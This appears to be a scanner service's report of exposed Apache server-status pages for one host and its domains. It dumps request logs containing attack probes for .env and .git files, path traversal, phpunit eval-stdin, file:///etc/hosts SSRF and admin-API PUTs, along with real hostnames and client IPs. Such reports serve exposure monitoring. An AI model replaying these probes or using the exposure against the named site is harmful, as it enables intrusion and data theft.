51.81.167.146http/1.1 0-1919946970/2/401_ 0.0200130990.00.018.94 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 0-1919946970/2/379_ 0.0200127210.00.0114.47 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-1919946970/2/401_ 0.0200114020.00.018.97 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-1919946970/0/385L 0.0000160640.00.009.46 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1919946970/1/374_ 0.0000141580.00.008.48 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 0-1919946970/1/390_ 0.0100113110.00.017.36 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 0-1919946970/0/396_ 0.00016176150.00.0018.74 51.178.207.154http/1.1 1-1919945620/1/393_ 0.000076020.00.009.48 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-1919945620/2/372_ 0.020060300.00.0113.27 51.81.167.146http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-1919945620/1/371_ 0.020092440.00.017.99 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 1-1919945620/1/374_ 0.0200108070.00.019.49 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1919945620/0/380_ 0.000296520.00.007.45 178.62.221.40http/1.1 1-1919945620/1/399_ 0.020097920.00.0113.18 164.92.224.29http/1.1 1-1919945620/3/365_ 0.020179690.00.018.36 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-1919945620/1/398_ 0.0000129790.00.0014.51 178.62.221.40http/1.1 1-1919945620/1/374_ 0.0200104300.00.018.99 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-1919945620/1/386_ 0.000090640.00.0017.51 51.81.167.146http/1.1 2-1919945630/0/291R 0.001090340.00.0015.66 164.92.224.29http/1.1 2-1919945630/0/297W 0.000067150.00.006.73 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-1919945630/2/312W 0.000064080.00.007.87 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-1919945630/0/305_ 0.000042510.00.006.37 164.92.224.29http/1.1 2-1919945630/0/300_ 0.000067910.00.006.65 164.92.224.29http/1.1 2-1919945630/3/296_ 0.000042330.00.009.57 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-1919945630/1/314_ 0.0010101040.00.008.25 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 2-1919945630/2/295R 0.000058660.00.016.74 164.92.224.29http/1.1 2-1919945630/0/288R 0.000034780.00.006.70 112.202.196.170http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST / HTTP/1.1 2-1919945630/1/300R 0.000041890.00.007.87 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-1919945640/2/613_ 0.0000259950.00.0116.64 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 3-1919945640/2/608_ 0.0000309310.00.0017.52 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-1919945640/1/611_ 0.0200266920.00.0112.33 164.92.224.29http/1.1 3-1919945640/3/615_ 0.0200264630.00.0017.02 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-1919945640/3/587_ 0.0200210900.00.0111.31 164.92.224.29http/1.1 3-1919945640/2/617_ 0.0000195440.00.0012.64 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-1919945640/1/581_ 0.0100301600.00.0117.23 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-1919945640/2/622_ 0.0200220760.00.0017.62 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-1919945640/1/628_ 0.0200270150.00.0115.54 164.92.224.29http/1.1 3-1919945640/2/626_ 0.0200252420.00.0214.71 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-1919945650/1/748_ 0.0100319370.00.0014.79 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-1919945650/2/746_ 0.0100390370.00.0020.92 164.92.224.29http/1.1 4-1919945650/1/776_ 0.0100459480.00.0026.74 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 4-1919945650/1/763_ 0.0100423240.00.0018.49 164.92.224.29http/1.1 4-1919945650/1/746_ 0.0100452710.00.0036.06 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-1919945650/2/760_ 0.0100417490.00.0119.77 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 4-1919945650/2/778_ 0.0100494300.00.0126.36 164.92.224.29http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 4-1919945650/0/757_ 0.0000398640.00.0027.11 141.95.110.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-content/themes/seoplugins/mar.php HTTP/1.1 4-1919945650/1/736_ 0.0101469450.00.0115.90 164.92.224.29http/1.1 4-1919945650/0/725_ 0.0000437020.00.0017.57 45.77.35.30http/1.17f7ffb32-1f6
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31cf3f3cb6cf3f3cb6b0fd4611
Apache Status Apache Server Status for tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Saturday, 12-Nov-2022 20:31:44 CET Restart Time: Friday, 11-Nov-2022 03:17:59 CET Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 1 day 17 hours 13 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 24310 - Total Traffic: 669.9 MB - Total Duration: 961325 CPU Usage: u3.98 s5.76 cu111.8 cs134.97 - .173% CPU load .164 requests/sec - 4732 B/second - 28.2 kB/request - 39.5444 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01994697no0yes010000 11994562no0yes19000 21994563no0yes010000 31994564no0yes19000 41994565no0yes010000 Sum500 248000 ___________R___________________________W__________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1919946970/1/379_ 0.010089990.00.007.42 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-1919946970/1/381_ 0.010092100.00.007.14 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-1919946970/2/389_ 0.0100106700.00.0110.06 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-1919946970/1/400_ 0.0000130990.00.008.94 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-1919946970/0/377_ 0.0001127210.00.0014.46 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x01\x04\x01 0-1919946970/0/399_ 0.00030114020.00.008.96 51.178.207.154http/1.1relehse.com:443HEAD /login?solarwinds HTTP/1.1 0-1919946970/0/385_ 0.0000160640.00.009.46 178.62.221.40http/1.1 0-1919946970/1/374_ 0.0000141580.00.008.48 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcHELP 0-1919946970/0/389_ 0.0000113110.00.007.35 178.62.221.40http/1.1 0-1919946970/0/396_ 0.00016176150.00.0018.74 51.178.207.154http/1.1 1-1919945620/1/393_ 0.000076020.00.009.48 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-1919945620/1/371R 0.000060300.00.0013.27 51.81.167.146http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc 1-1919945620/1/371_ 0.020092440.00.017.99 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 1-1919945620/1/374_ 0.0200108070.00.019.49 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1919945620/0/380_ 0.000296520.00.007.45 178.62.221.40http/1.1 1-1919945620/1/399_ 0.020097920.00.0113.18 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-1919945620/3/365_ 0.020179690.00.018.36 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-1919945620/1/398_ 0.0000129790.00.0014.51 178.62.221.40http/1.1 1-1919945620/1/374_ 0.0200104300.00.018.99 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-1919945620/1/386_ 0.000090640.00.0017.51 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-1919945630/0/291_ 0.000090340.00.0015.66 178.62.221.40http/1.1 2-1919945630/0/297_ 0.0021067150.00.006.73 34.78.6.216http/1.1 2-1919945630/2/312_ 0.000064080.00.007.87 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-1919945630/0/305_ 0.000042510.00.006.37 51.178.207.154http/1.1 2-1919945630/0/300_ 0.000067910.00.006.65 23.178.112.202http/1.1adr.tandemhse.com:80GET /.well-known/acme-challenge/xePvR7SjstvgSBxBN5EGxBr4PFWtMrd 2-1919945630/1/294_ 0.000042330.00.009.57 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-1919945630/1/314_ 0.0000101040.00.008.25 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 2-1919945630/2/295_ 0.000058660.00.016.74 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-1919945630/0/288_ 0.000034780.00.006.70 112.202.196.170http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST / HTTP/1.1 2-1919945630/1/300_ 0.000041890.00.007.87 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-1919945640/2/613_ 0.0000259950.00.0116.64 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 3-1919945640/2/608_ 0.0000309310.00.0017.52 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-1919945640/1/611_ 0.0200266920.00.0112.33 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-1919945640/1/613_ 0.0000264630.00.0017.02 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-1919945640/3/587_ 0.0200210900.00.0111.31 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 3-1919945640/2/617_ 0.0000195440.00.0012.64 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-1919945640/1/581_ 0.0100301600.00.0117.23 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-1919945640/1/621_ 0.0000220760.00.0017.62 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-1919945640/1/628_ 0.0200270150.00.0115.54 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 3-1919945640/1/625W 0.0000252420.00.0014.68 178.62.221.40http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-1919945650/0/747_ 0.0000319360.00.0014.78 178.62.221.40http/1.1 4-1919945650/2/746_ 0.0100390370.00.0020.92 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /api/v2/cmdb/system/admin/admin HTTP/1.1 4-1919945650/0/775_ 0.0000459480.00.0026.74 178.62.221.40http/1.1 4-1919945650/1/763_ 0.0100423240.00.0018.49 139.144.188.49http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-1919945650/0/745_ 0.0000452710.00.0036.06 178.62.221.40http/1.1 4-1919945650/1/759_ 0.0000417480.00.0019.76 178.62.221.40http/1.1 4-1919945650/1/777_ 0.0000494300.00.0026.35 195.211.77.140http/1.1 4-1919945650/0/757_ 0.0000398640.00.0027.11 141.95.110.165http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-content/themes/seoplugins/mar.php HTTP/1.1 4-1919945650/1/736_ 0.0101469450.00.0115.90 195.211.77.140http/1.17f7ffb32-1f6e-4d16-bdaa-07377
No description available
Severity: medium
Fingerprint: c72c1c3018e67f2f18e67f2f9d6971f19d6971f11de269c21de269c2cb4caa1d
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Monday, 03-Oct-2022 15:27:22 CEST Restart Time: Thursday, 25-Aug-2022 11:36:20 CEST Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 39 days 3 hours 51 minutes 2 seconds Server load: 0.10 0.07 0.02 Total accesses: 1022425 - Total Traffic: 50.7 GB - Total Duration: 40990020 CPU Usage: u178.27 s241 cu2808.07 cs3093.3 - .187% CPU load .302 requests/sec - 15.7 kB/second - 52.0 kB/request - 40.091 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01250733no0yes010000 11250735no0yes010000 21250734no0yes010000 31250865no2yes19001 41250736no0yes010000 Sum502 149001 ____________________________________W_____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2012507330/504/14362_ 41.1011704705210.012.92571.30 2.136.78.3http/1.1relehse.com:443GET /storage/images/companies/4SjQ6fIwHzKKSfv6domsoXTvkQDCemJ1R 0-2012507330/505/14327_ 41.1011704920360.013.71517.08 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/select2/select2.min.js HTTP/1.1 0-2012507330/499/14318_ 41.1011704174020.011.10536.64 2.136.78.3http/1.1relehse.com:443GET /storage/images/companies/YYbNygXxahUczkkc7W0NOqcjmcQd4TpHF 0-2012507330/505/14207_ 41.10104701430.012.18498.55 161.35.86.181http/1.1 0-2012507330/495/14426_ 41.10104243130.011.71557.20 161.35.86.181http/1.1 0-2012507330/504/14294_ 41.1011404019950.012.12519.03 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/touchpunch/jquery.ui.touch-punch.min. 0-2012507330/510/14323_ 41.1010404270150.012.88468.30 2.136.78.3http/1.1relehse.com:443GET /admin_layout/assets/js/libs/breakpoints.js HTTP/1.1 0-2012507330/503/14400_ 41.1011704077450.012.86545.19 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/noty/layouts/top.js HTTP/1.1 0-2012507330/497/14356_ 41.1011704543300.013.30543.21 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/easy-pie-chart/jquery.easy-pie-chart. 0-2012507330/506/14321_ 41.1011704394890.012.34504.52 2.136.78.3http/1.1relehse.com:443GET /admin_layout/assets/js/plugins.form-components.js HTTP/1.1 1-2012507350/839/20778_ 46.34018512700.018.74974.32 161.35.86.181http/1.1 1-2012507350/847/20691_ 46.42008548540.018.261085.43 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-2012507350/869/20819_ 46.41008070350.015.621072.49 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /idx_config/ HTTP/1.1 1-2012507350/879/20779_ 46.390228000380.019.171161.09 161.35.86.181http/1.1 1-2012507350/855/20852_ 46.32008099200.022.531122.46 161.35.86.181http/1.1 1-2012507350/858/20736_ 46.42008520930.017.841025.94 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/search?folderIds=0 HTTP/1.1 1-2012507350/854/20811_ 46.42008803390.020.081124.12 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-2012507350/850/20768_ 46.40008126800.021.551261.03 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 1-2012507350/875/20789_ 46.41008180420.019.011129.11 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e 1-2012507350/864/20715_ 46.42008497540.016.431086.63 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/geojson?url=file:///etc/hosts HTTP/1.1 2-2012507340/462/19781_ 43.09108398610.013.031150.01 161.35.86.181http/1.1 2-2012507340/461/19663_ 43.09008529570.011.011123.68 2.136.78.3http/1.1relehse.com:443GET /storage/images/companies/QGH2aYdYj3fZWCqvBrYQKEDKvjIFZCinw 2-2012507340/480/19755_ 43.100378420460.011.091143.51 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 2-2012507340/474/19646_ 43.09107835130.013.401255.79 2.136.78.3http/1.1relehse.com:443GET /admin_layout/assets/js/custom.js HTTP/1.1 2-2012507340/461/19701_ 43.09107759610.011.761078.03 161.35.86.181http/1.1 2-2012507340/466/19661_ 43.0911307872530.010.961212.29 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/cookie/jquery.cookie.min.js HTTP/1.1 2-2012507340/474/19845_ 43.14117723850.011.851232.91 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-2012507340/466/19793_ 43.15008213390.011.181128.40 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-2012507340/463/19690_ 43.15007992190.010.661157.29 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-2012507340/465/19741_ 43.0910407968810.012.151103.08 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/flot/jquery.flot.min.js HTTP/1.1 3-2012508650/878/21041_ 47.30108584420.018.02934.42 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/wysiwyg-editor-bootstrap/src/js/wysiw 3-2012508650/850/20869_ 47.3213258820410.022.55956.45 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-2012508650/862/20993_ 47.362319628700.019.731022.72 62.37.200.16http/1.1adr.tandemhse.com:443GET /index.php/gestion HTTP/1.1 3-2012508650/879/20993_ 47.3716208662770.015.96920.32 83.44.183.155http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 3-2012508650/827/21059_ 47.311308364600.016.59934.28 2.136.78.3http/1.1relehse.com:443GET /storage/images/companies/i199d5gT1hEnio3KwYkIjzZoNMHR33yL7 3-2012508650/882/21052_ 47.331198689620.018.85997.22 161.35.86.181http/1.1 3-2012508650/889/20933W 47.34008871170.016.89946.13 161.35.86.181http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-2012508650/879/21012_ 47.305408330070.019.81952.61 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/outlook/auth.js HTTP/1.1 3-2012508650/879/20933_ 47.371318519420.017.72971.97 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1664803629.60347795486450195312 3-2012508650/880/21187_ 47.3120238738640.017.411092.33 2.136.78.3http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-2012507360/422/26277_ 39.68117011430940.09.941396.88 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/bootbox/bootbox.js HTTP/1.1 4-2012507360/416/26385_ 39.68114011595930.09.941441.94 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/jtree-drag-drop/js/bootstrap-tooltip. 4-2012507360/413/26421_ 39.681171811521370.09.561427.42 83.44.20.36http/1.1relehse.com:443GET /admin/getNotifications HTTP/1.1 4-2012507360/427/26570_ 39.681011231740.010.651425.84 161.35.86.181http/1.1 4-2012507360/413/26304_ 39.68117011933860.09.201371.66 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/daterangepicker/daterangepicker.js HT 4-2012507360/421/26367_ 39.68117011242160.010.281493.59 2.136.78.3http/1.1relehse.com:443GET /admin_layout/assets/js/app.js HTTP/1.1 4-2012507360/422/26436_ 39.68114011519370.010.911384.79 2.136.78.3http/1.1relehse.com:443GET /admin_layout/assets/js/libs/jquery-1.10.2.min.js HTTP/1.1 4-2012507360/406/26404_ 39.68104011232570.011.201479.37 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/event.swipe/jquery.event.swipe.js HTT 4-2012507360/416/26517_ 39.68117011353020.012.681520.33 2.136.78.3http/1.1relehse.com:443GET /admin_layout/plugins/flot/jquery.flot.orderBars.min.js HTT 4-2012507360/426/26324_ 39.68117011504880.013.671374.86 2.136.78.3http/1.1relehse.com:443GET /storage/images/companies/qxS0AZlzkQ1SRUjE7OQCnQ3WWWWHuYFc9 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot SSL/TLS Session Cache Status: cache type: SHMCB, shared memory: 512000 bytes, current entries: 84subcaches: 32, indexes per subcache: 88time left on oldest entries' objects: avg: 159 seconds, (range: 2...299)index usage: 2%, cache usage: 3%total entries stored since starting: 9036total entries replaced since starting: 0total entries expired since starting: 8945total (pre-expiry) entries scrolled out of the cache: 0total retrieves since starting: 3477 hit, 94 misstotal removes since starting: 7 hit, 15 miss
Open service 103.23.61.80:443 · adr.tandemhse.com
2026-01-09 22:33
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 22:33:27 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 22:33:27 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · www.relehse.com
2026-01-09 21:15
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 21:15:15 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 21:15:15 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · www.adr.tandemhse.com
2026-01-09 19:55
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 19:55:18 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 19:55:18 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · pre.relehse.com
2026-01-09 16:09
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 16:10:01 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 16:10:01 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · pre.relehse.com
2026-01-09 15:34
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 15:34:03 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 15:34:03 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · www.relehse.com
2026-01-09 14:43
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 14:43:14 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 14:43:14 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · www.pre.relehse.com
2026-01-09 14:38
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 14:38:06 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 14:38:06 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · relehse.com
2026-01-09 11:50
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 11:50:52 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 11:50:52 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host
2026-01-09 11:50
HTTP/1.1 200 OK Date: Fri, 09 Jan 2026 11:50:50 GMT Server: Apache X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Cache-Control: max-age=172800 Expires: Sun, 11 Jan 2026 11:50:50 GMT Vary: Accept-Encoding Referrer-Policy: same-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: sameorigin Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 OK
Open service 103.23.61.80:443 · cinre-backend.tandemhse.com
2026-01-09 11:48
